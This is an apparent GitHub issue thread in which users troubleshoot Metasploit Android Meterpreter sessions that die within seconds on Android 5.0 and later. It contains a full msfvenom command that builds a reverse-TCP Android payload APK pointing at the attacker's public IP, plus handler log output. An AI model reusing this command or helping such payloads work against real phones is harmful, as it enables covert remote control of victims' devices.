
Meterpreter Session closes as soon as connected with android

rooks00 opened this issue · 5 comments

apk created using
msfvenom -p android/meterpreter/reverse_tcp LHOST=<my public ip> LPORT=4444 R > c.apk

after setting up the msfconsole with all correct details, when I open MainActivity, it sends me to meterpreter but then the session closes in 5-10 seconds.


This is making an assumption that you have the correct details. If you can't type 'sysinfo' on connect, it's likely that the session never actually was connected fully.

I tested it and as it turns out, it only works on Android 4.4.4 and below. Not working on higher Android Versions.
and I don't get System details when I type sysinfo as soon as session starts.

Ah. We have had some reports about Android 7.0. I have a hunch for a couple of other issues we've also seen in this area.

i'm having same issue i believe with android 5.0.1, app crashes as soon as it's launched

i am also having the same issue. i have tried this over Internet. works just fine for android Lollipop and lower versions. I have tried this in android Marshmallow and nougat but session died every time.
Started reverse TCP handler on ::1:4444
[] Starting the payload handler...
] Sending stage (67614 bytes) to ::1
[] Meterpreter session 20 opened (::1:4444 -> ::1:58208) at 2017-12-09 15:07:48 +0530
] Sending stage (67614 bytes) to ::1
[*] Meterpreter session 21 opened (::1:4444 -> ::1:58210) at 2017-12-09 15:07:48 +0530

meterpreter > [*] ::1 - Meterpreter session 20 closed. Reason: Died

if anyone got any solution for this. please let me know